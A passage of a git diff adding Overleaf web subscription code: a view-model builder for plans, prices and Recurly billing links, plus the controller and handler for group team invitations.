syncSubscription, + addUserToGroup, + refreshUsersFeatures, + removeUserFromGroup, + removeUserFromAllGroups, + deleteSubscription, + createDeletedSubscription, + deleteWithV1Id, + restoreSubscription, + updateSubscriptionFromRecurly, + }, +} diff --git a/services/web/app/src/Features/Subscription/SubscriptionViewModelBuilder.js b/services/web/app/src/Features/Subscription/SubscriptionViewModelBuilder.js new file mode 100644 index 0000000..45766dd --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionViewModelBuilder.js @@ -0,0 +1,614 @@ +// ts-check +const Settings = require('@overleaf/settings') +const RecurlyWrapper = require('./RecurlyWrapper') +const PlansLocator = require('./PlansLocator') +const { + isStandaloneAiAddOnPlanCode, + MEMBERS_LIMIT_ADD_ON_CODE, +} = require('./PaymentProviderEntities') +const SubscriptionFormatters = require('./SubscriptionFormatters') +const SubscriptionLocator = require('./SubscriptionLocator') +const SubscriptionUpdater = require('./SubscriptionUpdater') +const InstitutionsGetter = require('../Institutions/InstitutionsGetter') +const InstitutionsManager = require('../Institutions/InstitutionsManager') +const PublishersGetter = require('../Publishers/PublishersGetter') +const sanitizeHtml = require('sanitize-html') +const _ = require('lodash') +const async = require('async') +const SubscriptionHelper = require('./SubscriptionHelper') +const { callbackify } = require('@overleaf/promise-utils') +const { + InvalidError, + NotFoundError, + V1ConnectionError, +} = require('../Errors/Errors') +const FeaturesHelper = require('./FeaturesHelper') +const { formatCurrency } = require('../../util/currency') +const Modules = require('../../infrastructure/Modules') + +/** + * @import { Subscription } from "../../../../types/project/dashboard/subscription" + */ + +function buildHostedLink(type) { + return `/user/subscription/recurly/${type}` +} + +// Downgrade from Mongoose object, so we can add custom attributes to object +function serializeMongooseObject(object) { + return object && typeof object.toObject === 'function' + ? object.toObject() + : object +} + +async function getRedirectToHostedPage(userId, pageType) { + if (!['billing-details', 'account-management'].includes(pageType)) { + throw new InvalidError('unexpected page type') + } + const personalSubscription = + await SubscriptionLocator.promises.getUsersSubscription(userId) + const recurlySubscriptionId = personalSubscription?.recurlySubscription_id + if (!recurlySubscriptionId) { + throw new NotFoundError('not a recurly subscription') + } + const recurlySubscription = await RecurlyWrapper.promises.getSubscription( + recurlySubscriptionId, + { includeAccount: true } + ) + + const recurlySubdomain = Settings.apis.recurly.subdomain + const hostedLoginToken = recurlySubscription.account.hosted_login_token + if (!hostedLoginToken) { + throw new Error('recurly account does not have hosted login token') + } + let path = '' + if (pageType === 'billing-details') { + path = 'billing_info/edit?ht=' + } + return [ + 'https://', + recurlySubdomain, + '.recurly.com/account/', + path, + hostedLoginToken, + ].join('') +} + +async function buildUsersSubscriptionViewModel(user, locale = 'en') { + let { + personalSubscription, + memberGroupSubscriptions, + managedGroupSubscriptions, + currentInstitutionsWithLicence, + managedInstitutions, + managedPublishers, + fetchedPaymentRecord, + plan, + } = await async.auto({ + personalSubscription(cb) { + SubscriptionLocator.getUsersSubscription(user, cb) + }, + fetchedPaymentRecord: [ + 'personalSubscription', + ({ personalSubscription }, cb) => { + Modules.hooks.fire('getPaymentFromRecord', personalSubscription, cb) + }, + ], + plan: [ + 'personalSubscription', + ({ personalSubscription }, cb) => { + if (personalSubscription == null) { + return cb() + } + const plan = PlansLocator.findLocalPlanInSettings( + personalSubscription.planCode + ) + if (plan == null) { + return cb( + new Error( + `No plan found for planCode '${personalSubscription.planCode}'` + ) + ) + } + cb(null, plan) + }, + ], + memberGroupSubscriptions(cb) { + SubscriptionLocator.getMemberSubscriptions(user, cb) + }, + managedGroupSubscriptions(cb) { + SubscriptionLocator.getManagedGroupSubscriptions(user, cb) + }, + currentInstitutionsWithLicence(cb) { + InstitutionsGetter.getCurrentInstitutionsWithLicence( + user._id, + (error, institutions) => { + if (error instanceof V1ConnectionError) { + return cb(null, false) + } + cb(null, institutions) + } + ) + }, + managedInstitutions(cb) { + InstitutionsGetter.getManagedInstitutions(user._id, cb) + }, + managedPublishers(cb) { + PublishersGetter.getManagedPublishers(user._id, cb) + }, + }) + + const paymentRecord = fetchedPaymentRecord && fetchedPaymentRecord[0] + + if (memberGroupSubscriptions == null) { + memberGroupSubscriptions = [] + } else { + memberGroupSubscriptions = memberGroupSubscriptions.map(group => { + const userIsGroupManager = group.manager_ids?.some( + id => id.toString() === user._id.toString() + ) + + const groupDataForView = { + _id: group._id, + planCode: group.planCode, + teamName: group.teamName, + admin_id: { + email: group.admin_id.email, + }, + userIsGroupManager, + } + + if (group.teamNotice) { + groupDataForView.teamNotice = sanitizeHtml(group.teamNotice) + } + + buildGroupSubscriptionForView(groupDataForView) + + return groupDataForView + }) + } + + if (managedGroupSubscriptions == null) { + managedGroupSubscriptions = [] + } else { + managedGroupSubscriptions = managedGroupSubscriptions.map(group => { + const userIsGroupMember = group.member_ids?.some( + id => id.toString() === user._id.toString() + ) + + const groupDataForView = { + _id: group._id, + planCode: group.planCode, + groupPlan: group.groupPlan, + teamName: group.teamName, + admin_id: { + _id: group.admin_id._id, + email: group.admin_id.email, + }, + features: group.features, + userIsGroupMember, + } + + buildGroupSubscriptionForView(groupDataForView) + + return groupDataForView + }) + } + + if (managedInstitutions == null) { + managedInstitutions = [] + } + + personalSubscription = serializeMongooseObject(personalSubscription) + + managedInstitutions = managedInstitutions.map(serializeMongooseObject) + await Promise.all( + managedInstitutions.map(InstitutionsManager.promises.fetchV1Data) + ) + managedPublishers = managedPublishers.map(serializeMongooseObject) + await Promise.all( + managedPublishers.map(PublishersGetter.promises.fetchV1Data) + ) + + if (plan != null) { + personalSubscription.plan = plan + } + + function getPlanOnlyDisplayPrice( + totalPlanPriceInCents, + taxRate, + addOns = [] + ) { + // The MEMBERS_LIMIT_ADD_ON_CODE is considered as part of the new plan model + const allAddOnsPriceInCentsExceptAdditionalLicensePrice = addOns.reduce( + (prev, curr) => { + return curr.code !== MEMBERS_LIMIT_ADD_ON_CODE + ? curr.quantity * curr.unitPrice + prev + : prev + }, + 0 + ) + const allAddOnsTotalPriceInCentsExceptAdditionalLicensePrice = + allAddOnsPriceInCentsExceptAdditionalLicensePrice + + allAddOnsPriceInCentsExceptAdditionalLicensePrice * taxRate + + return formatCurrency( + totalPlanPriceInCents - + allAddOnsTotalPriceInCentsExceptAdditionalLicensePrice, + paymentRecord.subscription.currency, + locale + ) + } + + function getAddOnDisplayPricesWithoutAdditionalLicense(taxRate, addOns = []) { + return addOns.reduce((prev, curr) => { + if (curr.code !== MEMBERS_LIMIT_ADD_ON_CODE) { + const priceInCents = curr.quantity * curr.unitPrice + const totalPriceInCents = priceInCents + priceInCents * taxRate + + if (totalPriceInCents > 0) { + prev[curr.code] = formatCurrency( + totalPriceInCents, + paymentRecord.subscription.currency, + locale + ) + } + } + + return prev + }, {}) + } + + if (personalSubscription && paymentRecord && paymentRecord.subscription) { + // don't return subscription payment information + delete personalSubscription.paymentProvider + delete personalSubscription.recurly + + const tax = paymentRecord.subscription.taxAmount || 0 + // Some plans allow adding more seats than the base plan provides. + // This is recorded as a subscription add on. + // Note: taxAmount already includes the tax for any addon. + let addOnPrice = 0 + let additionalLicenses = 0 + const addOns = paymentRecord.subscription.addOns || [] + const taxRate = paymentRecord.subscription.taxRate + addOns.forEach(addOn => { + addOnPrice += addOn.quantity * addOn.unitPrice + if (addOn.code === plan.membersLimitAddOn) { + additionalLicenses += addOn.quantity + } + }) + const totalLicenses = (plan.membersLimit || 0) + additionalLicenses + personalSubscription.payment = { + taxRate, + billingDetailsLink: buildHostedLink('billing-details'), + accountManagementLink: buildHostedLink('account-management'), + additionalLicenses, + addOns, + totalLicenses, + nextPaymentDueAt: SubscriptionFormatters.formatDateTime( + paymentRecord.subscription.periodEnd + ), + nextPaymentDueDate: SubscriptionFormatters.formatDate( + paymentRecord.subscription.periodEnd + ), + currency: paymentRecord.subscription.currency, + state: paymentRecord.subscription.state, + trialEndsAtFormatted: SubscriptionFormatters.formatDateTime( + paymentRecord.subscription.trialPeriodEnd + ), + trialEndsAt: paymentRecord.subscription.trialPeriodEnd, + activeCoupons: paymentRecord.coupons, + accountEmail: paymentRecord.account.email, + hasPastDueInvoice: paymentRecord.account.hasPastDueInvoice, + pausedAt: paymentRecord.subscription.pausePeriodStart, + remainingPauseCycles: paymentRecord.subscription.remainingPauseCycles, + } + if (paymentRecord.subscription.pendingChange) { + const pendingPlanCode = + paymentRecord.subscription.pendingChange.nextPlanCode + const pendingPlan = PlansLocator.findLocalPlanInSettings(pendingPlanCode) + if (pendingPlan == null) { + throw new Error(`No plan found for planCode '${pendingPlanCode}'`) + } + let pendingAdditionalLicenses = 0 + let pendingAddOnTax = 0 + let pendingAddOnPrice = 0 + if (paymentRecord.subscription.pendingChange.nextAddOns) { + const pendingAddOns = + paymentRecord.subscription.pendingChange.nextAddOns + pendingAddOns.forEach(addOn => { + pendingAddOnPrice += addOn.quantity * addOn.unitPrice + if (addOn.code === pendingPlan.membersLimitAddOn) { + pendingAdditionalLicenses += addOn.quantity + } + }) + // Need to calculate tax ourselves as we don't get tax amounts for pending subs + pendingAddOnTax = + personalSubscription.payment.taxRate * pendingAddOnPrice + pendingPlan.addOns = pendingAddOns + } + const pendingSubscriptionTax = + personalSubscription.payment.taxRate * + paymentRecord.subscription.pendingChange.nextPlanPrice + const totalPrice = + paymentRecord.subscription.pendingChange.nextPlanPrice + + pendingAddOnPrice + + pendingAddOnTax + + pendingSubscriptionTax + + personalSubscription.payment.displayPrice = formatCurrency( + totalPrice, + paymentRecord.subscription.currency, + locale + ) + personalSubscription.payment.planOnlyDisplayPrice = + getPlanOnlyDisplayPrice( + totalPrice, + taxRate, + paymentRecord.subscription.pendingChange.nextAddOns + ) + personalSubscription.payment.addOnDisplayPricesWithoutAdditionalLicense = + getAddOnDisplayPricesWithoutAdditionalLicense( + taxRate, + paymentRecord.subscription.pendingChange.nextAddOns + ) + const pendingTotalLicenses = + (pendingPlan.membersLimit || 0) + pendingAdditionalLicenses + personalSubscription.payment.pendingAdditionalLicenses = + pendingAdditionalLicenses + personalSubscription.payment.pendingTotalLicenses = pendingTotalLicenses + personalSubscription.pendingPlan = pendingPlan + } else { + const totalPrice = paymentRecord.subscription.planPrice + addOnPrice + tax + personalSubscription.payment.displayPrice = formatCurrency( + totalPrice, + paymentRecord.subscription.currency, + locale + ) + personalSubscription.payment.planOnlyDisplayPrice = + getPlanOnlyDisplayPrice(totalPrice, taxRate, addOns) + personalSubscription.payment.addOnDisplayPricesWithoutAdditionalLicense = + getAddOnDisplayPricesWithoutAdditionalLicense(taxRate, addOns) + } + } + + return { + personalSubscription, + managedGroupSubscriptions, + memberGroupSubscriptions, + currentInstitutionsWithLicence, + managedInstitutions, + managedPublishers, + } +} + +/** + * @param {{_id: string}} user + * @returns {Promise<Subscription>} + */ +async function getBestSubscription(user) { + let [ + individualSubscription, + memberGroupSubscriptions, + currentInstitutionsWithLicence, + ] = await Promise.all([ + SubscriptionLocator.promises.getUsersSubscription(user), + SubscriptionLocator.promises.getMemberSubscriptions(user), + InstitutionsGetter.promises.getCurrentInstitutionsWithLicence(user._id), + ]) + if ( + individualSubscription && + !individualSubscription.customAccount && + individualSubscription.recurlySubscription_id && + !individualSubscription.recurlyStatus?.state + ) { + const recurlySubscription = await RecurlyWrapper.promises.getSubscription( + individualSubscription.recurlySubscription_id, + { includeAccount: true } + ) + await SubscriptionUpdater.promises.updateSubscriptionFromRecurly( + recurlySubscription, + individualSubscription + ) + individualSubscription = + await SubscriptionLocator.promises.getUsersSubscription(user) + } + let bestSubscription = { + type: 'free', + } + if (currentInstitutionsWithLicence?.length) { + for (const institutionMembership of currentInstitutionsWithLicence) { + const plan = PlansLocator.findLocalPlanInSettings( + Settings.institutionPlanCode + ) + if (_isPlanEqualOrBetter(plan, bestSubscription.plan)) { + bestSubscription = { + type: 'commons', + subscription: institutionMembership, + plan, + } + } + } + } + if (memberGroupSubscriptions?.length) { + for (const groupSubscription of memberGroupSubscriptions) { + const plan = PlansLocator.findLocalPlanInSettings( + groupSubscription.planCode + ) + if (_isPlanEqualOrBetter(plan, bestSubscription.plan)) { + const groupDataForView = {} + if (groupSubscription.teamName) { + groupDataForView.teamName = groupSubscription.teamName + } + const remainingTrialDays = _getRemainingTrialDays(groupSubscription) + bestSubscription = { + type: 'group', + subscription: groupDataForView, + plan, + remainingTrialDays, + } + } + } + } + if (individualSubscription && !individualSubscription.groupPlan) { + if ( + isStandaloneAiAddOnPlanCode(individualSubscription.planCode) && + bestSubscription.type === 'free' + ) { + bestSubscription = { type: 'standalone-ai-add-on' } + } else { + const plan = PlansLocator.findLocalPlanInSettings( + individualSubscription.planCode + ) + if (_isPlanEqualOrBetter(plan, bestSubscription.plan)) { + const remainingTrialDays = _getRemainingTrialDays( + individualSubscription + ) + bestSubscription = { + type: 'individual', + subscription: individualSubscription, + plan, + remainingTrialDays, + } + } + } + } + return bestSubscription +} + +function buildPlansList(currentPlan) { + const { plans } = Settings + + const allPlans = {} + plans.forEach(plan => { + allPlans[plan.planCode] = plan + }) + + const result = { allPlans } + + if (currentPlan) { + result.planCodesChangingAtTermEnd = _.map( + _.filter(plans, plan => { + if (!plan.hideFromUsers) { + return SubscriptionHelper.shouldPlanChangeAtTermEnd(currentPlan, plan) + } + }), + 'planCode' + ) + } + + result.studentAccounts = _.filter( + plans, + plan => plan.planCode.indexOf('student') !== -1 + ) + + result.groupMonthlyPlans = _.filter( + plans, + plan => plan.groupPlan && !plan.annual + ) + + result.groupAnnualPlans = _.filter( + plans, + plan => plan.groupPlan && plan.annual + ) + + result.individualMonthlyPlans = _.filter( + plans, + plan => + !plan.groupPlan && + !plan.annual && + plan.planCode !== 'personal' && // Prevent the personal plan from appearing on the change-plans page + plan.planCode.indexOf('student') === -1 + ) + + result.individualAnnualPlans = _.filter( + plans, + plan => + !plan.groupPlan && plan.annual && plan.planCode.indexOf('student') === -1 + ) + + return result +} + +function _isPlanEqualOrBetter(planA, planB) { + return FeaturesHelper.isFeatureSetBetter( + planA?.features || {}, + planB?.features || {} + ) +} + +function _getRemainingTrialDays(subscription) { + const now = new Date() + const trialEndDate = subscription.recurlyStatus?.trialEndsAt + return trialEndDate && trialEndDate > now + ? Math.ceil( + (trialEndDate.getTime() - now.getTime()) / (24 * 60 * 60 * 1000) + ) + : -1 +} + +function buildGroupSubscriptionForView(groupSubscription) { + // most group plans in Recurly should be in form "group_plancode_size_usage" + const planLevelFromGroupPlanCode = groupSubscription.planCode.substr(6, 12) + if (planLevelFromGroupPlanCode === 'professional') { + groupSubscription.planLevelName = 'Professional' + } else if (planLevelFromGroupPlanCode === 'collaborator') { + groupSubscription.planLevelName = 'Standard' + } + // there are some group subscription entries that have the personal plancodes... + // this fallback tries to still show the right thing in these cases: + if (!groupSubscription.planLevelName) { + if (groupSubscription.planCode.startsWith('professional')) { + groupSubscription.planLevelName = 'Professional' + } else if (groupSubscription.planCode.startsWith('collaborator')) { + groupSubscription.planLevelName = 'Standard' + } else { + // if we still don't have anything, we can show the plan name (eg, v1 Pro): + const plan = PlansLocator.findLocalPlanInSettings( + groupSubscription.planCode + ) + groupSubscription.planLevelName = plan + ? plan.name + : groupSubscription.planCode + } + } +} + +function buildPlansListForSubscriptionDash(currentPlan) { + const allPlansData = buildPlansList(currentPlan) + const plans = [] + // only list individual and visible plans for "change plans" UI + if (allPlansData.studentAccounts) { + plans.push( + ...allPlansData.studentAccounts.filter(plan => !plan.hideFromUsers) + ) + } + if (allPlansData.individualMonthlyPlans) { + plans.push( + ...allPlansData.individualMonthlyPlans.filter(plan => !plan.hideFromUsers) + ) + } + if (allPlansData.individualAnnualPlans) { + plans.push( + ...allPlansData.individualAnnualPlans.filter(plan => !plan.hideFromUsers) + ) + } + + return { + plans, + planCodesChangingAtTermEnd: allPlansData.planCodesChangingAtTermEnd, + } +} + +module.exports = { + buildUsersSubscriptionViewModel: callbackify(buildUsersSubscriptionViewModel), + buildPlansList, + buildPlansListForSubscriptionDash, + getBestSubscription: callbackify(getBestSubscription), + promises: { + buildUsersSubscriptionViewModel, + getRedirectToHostedPage, + getBestSubscription, + }, +} diff --git a/services/web/app/src/Features/Subscription/TeamInvitesController.mjs b/services/web/app/src/Features/Subscription/TeamInvitesController.mjs new file mode 100644 index 0000000..ca50875 --- /dev/null +++ b/services/web/app/src/Features/Subscription/TeamInvitesController.mjs @@ -0,0 +1,307 @@ +import settings from '@overleaf/settings' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import TeamInvitesHandler from './TeamInvitesHandler.js' +import SessionManager from '../Authentication/SessionManager.js' +import SubscriptionLocator from './SubscriptionLocator.js' +import ErrorController from '../Errors/ErrorController.js' +import EmailHelper from '../Helpers/EmailHelper.js' +import UserGetter from '../User/UserGetter.js' +import { expressify } from '@overleaf/promise-utils' +import HttpErrorHandler from '../Errors/HttpErrorHandler.js' +import PermissionsManager from '../Authorization/PermissionsManager.js' +import EmailHandler from '../Email/EmailHandler.js' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import Modules from '../../infrastructure/Modules.js' +import UserAuditLogHandler from '../User/UserAuditLogHandler.js' + +const rateLimiters = { + resendGroupInvite: new RateLimiter('resend-group-invite', { + points: 1, + duration: 60 * 60, + }), +} + +async function createInvite(req, res, next) { + const teamManagerId = SessionManager.getLoggedInUserId(req.session) + const subscription = req.entity + const email = EmailHelper.parseEmail(req.body.email) + if (!email) { + return res.status(422).json({ + error: { + code: 'invalid_email', + message: req.i18n.translate('invalid_email'), + }, + }) + } + + try { + const invitedUserData = await TeamInvitesHandler.promises.createInvite( + teamManagerId, + subscription, + email + ) + return res.json({ user: invitedUserData }) + } catch (err) { + if (err.alreadyInTeam) { + return res.status(400).json({ + error: { + code: 'user_already_added', + message: req.i18n.translate('user_already_added'), + }, + }) + } + if (err.limitReached) { + return res.status(400).json({ + error: { + code: 'group_full', + message: req.i18n.translate('group_full'), + }, + }) + } + } +} + +async function viewInvite(req, res, next) { + const { token } = req.params + const sessionUser = SessionManager.getSessionUser(req.session) + const userId = sessionUser?._id + const { invite, subscription } = + await TeamInvitesHandler.promises.getInvite(token) + + if (!invite) { + return ErrorController.notFound(req, res) + } + + const groupSSOActive = ( + await Modules.promises.hooks.fire('hasGroupSSOEnabled', subscription) + )?.[0] + + let validationStatus = new Map() + if (userId) { + const personalSubscription = + await SubscriptionLocator.promises.getUsersSubscription(userId) + + const hasIndividualRecurlySubscription = + personalSubscription && + personalSubscription.groupPlan === false && + personalSubscription.recurlyStatus?.state !== 'canceled' && + personalSubscription.recurlySubscription_id && + personalSubscription.recurlySubscription_id !== '' + + if (subscription?.managedUsersEnabled) { + if (!subscription.populated('groupPolicy')) { + // eslint-disable-next-line no-restricted-syntax + await subscription.populate('groupPolicy') + } + + const dbUser = await UserGetter.promises.getUser(userId) + + const isUserEnrolledInDifferentGroup = + ( + await Modules.promises.hooks.fire( + 'isUserEnrolledInDifferentGroup', + dbUser.enrollment, + subscription._id + ) + )?.[0] === true + if (isUserEnrolledInDifferentGroup) { + return HttpErrorHandler.forbidden( + req, + res, + 'User is already enrolled in a different subscription' + ) + } + + validationStatus = + await PermissionsManager.promises.getUserValidationStatus({ + user: dbUser, + groupPolicy: subscription.groupPolicy, + subscription, + }) + + let currentManagedUserAdminEmail + try { + currentManagedUserAdminEmail = + await SubscriptionLocator.promises.getAdminEmail(subscription._id) + } catch (err) { + logger.error({ err }, 'error getting subscription admin email') + } + + return res.render('subscriptions/team/invite-managed', { + inviterName: invite.inviterName, + inviteToken: invite.token, + expired: req.query.expired, + validationStatus: Object.fromEntries(validationStatus), + currentManagedUserAdminEmail, + groupSSOActive, + subscriptionId: subscription._id.toString(), + user: sessionUser, + }) + } else { + let currentManagedUserAdminEmail + try { + currentManagedUserAdminEmail = + await SubscriptionLocator.promises.getAdminEmail(req.managedBy) + } catch (err) { + logger.error({ err }, 'error getting subscription admin email') + } + + return res.render('subscriptions/team/invite', { + inviterName: invite.inviterName, + inviteToken: invite.token, + hasIndividualRecurlySubscription, + expired: req.query.expired, + userRestrictions: Array.from(req.userRestrictions || []), + currentManagedUserAdminEmail, + groupSSOActive, + subscriptionId: subscription._id.toString(), + user: sessionUser, + }) + } + } else { + const userByEmail = await UserGetter.promises.getUserByMainEmail( + invite.email + ) + + return res.render('subscriptions/team/invite_logged_out', { + inviterName: invite.inviterName, + inviteToken: invite.token, + appName: settings.appName, + accountExists: userByEmail != null, + emailAddress: invite.email, + user: { id: null }, + groupSSOActive, + }) + } +} + +async function viewInvites(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + const groupSubscriptions = + await SubscriptionLocator.promises.getGroupsWithTeamInvitesEmail(user.email) + + const teamInvites = groupSubscriptions.map(groupSubscription => + groupSubscription.teamInvites.find(invite => invite.email === user.email) + ) + + return res.render('subscriptions/team/group-invites', { + teamInvites, + user, + }) +} + +async function acceptInvite(req, res, next) { + const { token } = req.params + const userId = SessionManager.getLoggedInUserId(req.session) + + const subscription = await TeamInvitesHandler.promises.acceptInvite( + token, + userId + ) + const groupSSOActive = ( + await Modules.promises.hooks.fire('hasGroupSSOEnabled', subscription) + )?.[0] + + try { + await UserAuditLogHandler.promises.addEntry( + userId, + 'accept-group-invitation', + userId, + req.ip, + { subscriptionId: subscription._id } + ) + } catch (e) { + logger.error( + { err: e, userId, subscriptionId: subscription._id }, + 'error adding audit log entry' + ) + } + + res.json({ groupSSOActive }) +} + +function revokeInvite(req, res, next) { + const subscription = req.entity + const email = EmailHelper.parseEmail(req.params.email) + const teamManagerId = SessionManager.getLoggedInUserId(req.session) + if (!email) { + return res.sendStatus(400) + } + + TeamInvitesHandler.revokeInvite( + teamManagerId, + subscription, + email, + function (err, results) { + if (err) { + return next(err) + } + res.sendStatus(204) + } + ) +} + +async function resendInvite(req, res, next) { + const { entity: subscription } = req + const userEmail = EmailHelper.parseEmail(req.body.email) + await subscription.populate('admin_id', ['email', 'first_name', 'last_name']) + + if (!userEmail) { + throw new Error('invalid email') + } + + const currentInvite = subscription.teamInvites.find( + invite => invite?.email === userEmail + ) + + if (!currentInvite) { + return await createInvite(req, res) + } + + const opts = { + to: userEmail, + admin: subscription.admin_id, + inviter: currentInvite.inviterName, + acceptInviteUrl: `${settings.siteUrl}/subscription/invites/${currentInvite.token}/`, + reminder: true, + } + + try { + await rateLimiters.resendGroupInvite.consume(userEmail, 1, { + method: 'email', + }) + + const existingUser = await UserGetter.promises.getUserByAnyEmail(userEmail) + + let emailTemplate + if (subscription.managedUsersEnabled) { + if (existingUser) { + emailTemplate = 'verifyEmailToJoinManagedUsers' + } else { + emailTemplate = 'inviteNewUserToJoinManagedUsers' + } + } else { + emailTemplate = 'verifyEmailToJoinTeam' + } + + EmailHandler.sendDeferredEmail(emailTemplate, opts) + } catch (err) { + if (err?.remainingPoints === 0) { + return res.sendStatus(429) + } else { + throw OError.tag(err, 'Failed to resend group invite email') + } + } + + return res.status(200).json({ success: true }) +} + +export default { + createInvite: expressify(createInvite), + viewInvite: expressify(viewInvite), + viewInvites: expressify(viewInvites), + acceptInvite: expressify(acceptInvite), + revokeInvite, + resendInvite: expressify(resendInvite), +} diff --git a/services/web/app/src/Features/Subscription/TeamInvitesHandler.js b/services/web/app/src/Features/Subscription/TeamInvitesHandler.js new file mode 100644 index 0000000..45a0495 --- /dev/null +++ b/services/web/app/src/Features/Subscription/TeamInvitesHandler.js @@ -0,0 +1,370 @@ +const logger = require('@overleaf/logger') +const crypto = require('crypto') + +const settings = require('@overleaf/settings') +const Modules = require('../../infrastructure/Modules') +const { ObjectId } = require('mongodb-legacy') + +const { Subscription } = require('../../models/Subscription') +const { SSOConfig } = require('../../models/SSOConfig') + +const UserGetter = require('../User/UserGetter') +const SubscriptionLocator = require('./SubscriptionLocator') +const SubscriptionUpdater = require('./SubscriptionUpdater') +const LimitationsManager = require('./LimitationsManager') + +const EmailHandler = require('../Email/EmailHandler') +const EmailHelper = require('../Helpers/EmailHelper') + +const Errors = require('../Errors/Errors') +const { + callbackify, + callbackifyMultiResult, +} = require('@overleaf/promise-utils') +const NotificationsBuilder = require('../Notifications/NotificationsBuilder') + +async function getInvite(token) { + const subscription = await Subscription.findOne({ + 'teamInvites.token': token, + }) + if (!subscription) { + throw new Errors.NotFoundError('team not found') + } + + const invite = subscription.teamInvites.find(i => i.token === token) + return { invite, subscription } +} + +async function createInvite(teamManagerId, subscription, email) { + email = EmailHelper.parseEmail(email) + if (!email) { + throw new Error('invalid email') + } + const teamManager = await UserGetter.promises.getUser(teamManagerId) + + await _removeLegacyInvite(subscription.id, email) + return _createInvite(subscription, email, teamManager) +} + +async function importInvite(subscription, inviterName, email, token, sentAt) { + const { possible, reason } = await _checkIfInviteIsPossible( + subscription, + email + ) + if (!possible) { + throw reason + } + subscription.teamInvites.push({ + email, + inviterName, + token, + sentAt, + }) + + return subscription.save() +} + +async function acceptInvite(token, userId) { + const { invite, subscription } = await getInvite(token) + if (!invite) { + throw new Errors.NotFoundError('invite not found') + } + + await SubscriptionUpdater.promises.addUserToGroup(subscription._id, userId) + + if (subscription.managedUsersEnabled) { + await Modules.promises.hooks.fire( + 'enrollInManagedSubscription', + userId, + subscription + ) + } + if (subscription.ssoConfig) { + const ssoConfig = await SSOConfig.findById( + subscription.ssoConfig._id || subscription.ssoConfig + ) + if (ssoConfig?.enabled) { + await Modules.promises.hooks.fire( + 'scheduleGroupSSOReminder', + userId, + subscription._id + ) + } + } + + await _removeInviteFromTeam(subscription.id, invite.email) + + await NotificationsBuilder.promises + .groupInvitation(userId, subscription._id, false) + .read() + + return subscription +} + +async function revokeInvite(teamManagerId, subscription, email) { + email = EmailHelper.parseEmail(email) + + if (!email) { + throw new Error('invalid email') + } + + await _removeInviteFromTeam(subscription.id, email) + + // Remove group invitation dashboard notification if invitation is revoked before + // the invited user accepted the group invitation + const user = await UserGetter.promises.getUserByAnyEmail(email) + if (user) { + await NotificationsBuilder.promises + .groupInvitation(user._id, subscription._id, false) + .read() + } +} + +// Legacy method to allow a user to receive a confirmation email if their +// email is in Subscription.invited_emails when they join. We'll remove this +// after a short while. +async function createTeamInvitesForLegacyInvitedEmail(email) { + const teams = + await SubscriptionLocator.promises.getGroupsWithEmailInvite(email) + return Promise.all( + teams.map(team => createInvite(team.admin_id, team, email)) + ) +} + +async function _createInvite(subscription, email, inviter) { + const { possible, reason } = await _checkIfInviteIsPossible( + subscription, + email + ) + + if (!possible) { + throw reason + } + + // don't send invites when inviting self; add user directly to the group + const isInvitingSelf = inviter.emails.some( + emailData => emailData.email === email + ) + if (isInvitingSelf) { + await SubscriptionUpdater.promises.addUserToGroup( + subscription._id, + inviter._id + ) + + // legacy: remove any invite that might have been created in the past + await _removeInviteFromTeam(subscription._id, email) + + try { + if (subscription.ssoConfig) { + const ssoConfig = await SSOConfig.findById( + subscription.ssoConfig._id || subscription.ssoConfig + ) + if (ssoConfig?.enabled) { + await Modules.promises.hooks.fire( + 'sendGroupSSOReminder', + inviter._id, + subscription._id + ) + } + } + } catch (error) { + logger.error( + { err: error, userId: inviter._id, subscriptionId: subscription._id }, + 'Failed to schedule Group SSO invite for group admin' + ) + } + + return { + email: inviter.email, + first_name: inviter.first_name, + last_name: inviter.last_name, + invite: false, + } + } + + const inviterName = _getInviterName(inviter) + let invite = subscription.teamInvites.find(invite => invite.email === email) + + if (invite) { + invite = invite.toObject() + invite.sentAt = new Date() + } else { + invite = { + email, + inviterName, + token: crypto.randomBytes(32).toString('hex'), + sentAt: new Date(), + } + subscription.teamInvites.push(invite) + } + + try { + await _sendNotificationToExistingUser( + subscription, + email, + invite, + subscription.managedUsersEnabled + ) + } catch (err) { + logger.error( + { err }, + 'Failed to send notification to existing user when creating group invitation' + ) + } + + await subscription.save() + + if (subscription.managedUsersEnabled) { + let admin = {} + try { + admin = await SubscriptionLocator.promises.getAdminEmailAndName( + subscription._id + ) + } catch (err) { + logger.error({ err }, 'error getting subscription admin email and name') + } + + const user = await UserGetter.promises.getUserByAnyEmail(email) + + const opts = { + to: email, + admin, + inviter, + acceptInviteUrl: `${settings.siteUrl}/subscription/invites/${invite.token}/`, + appName: settings.appName, + } + + if (user) { + await EmailHandler.promises.sendEmail( + 'verifyEmailToJoinManagedUsers', + opts + ) + } else { + await EmailHandler.promises.sendEmail( + 'inviteNewUserToJoinManagedUsers', + opts + ) + } + } else { + const opts = { + to: email, + inviter, + acceptInviteUrl: `${settings.siteUrl}/subscription/invites/${invite.token}/`, + appName: settings.appName, + } + + await EmailHandler.promises.sendEmail('verifyEmailToJoinTeam', opts) + } + + Object.assign(invite, { invite: true }) + return invite +} + +async function _removeInviteFromTeam(subscriptionId, email, callback) { + const searchConditions = { _id: new ObjectId(subscriptionId.toString()) } + const removeInvite = { $pull: { teamInvites: { email } } } + + await Subscription.updateOne(searchConditions, removeInvite) + await _removeLegacyInvite(subscriptionId, email) +} + +async function _sendNotificationToExistingUser( + subscription, + email, + invite, + managedUsersEnabled +) { + const user = await UserGetter.promises.getUserByMainEmail(email) + + if (!user) { + return + } + + await NotificationsBuilder.promises + .groupInvitation( + user._id.toString(), + subscription._id.toString(), + managedUsersEnabled + ) + .create(invite) +} + +async function _removeLegacyInvite(subscriptionId, email) { + await Subscription.updateOne( + { + _id: new ObjectId(subscriptionId.toString()), + }, + { + $pull: { + invited_emails: email, + }, + } + ) +} + +async function _checkIfInviteIsPossible(subscription, email) { + if (!subscription.groupPlan) { + logger.debug( + { subscriptionId: subscription.id }, + 'can not add members to a subscription that is not in a group plan' + ) + return { possible: false, reason: { wrongPlan: true } } + } + + if (LimitationsManager.teamHasReachedMemberLimit(subscription)) { + logger.debug( + { subscriptionId: subscription.id }, + 'team has reached member limit' + ) + return { possible: false, reason: { limitReached: true } } + } + + const existingUser = await UserGetter.promises.getUserByAnyEmail(email) + if (!existingUser) { + return { possible: 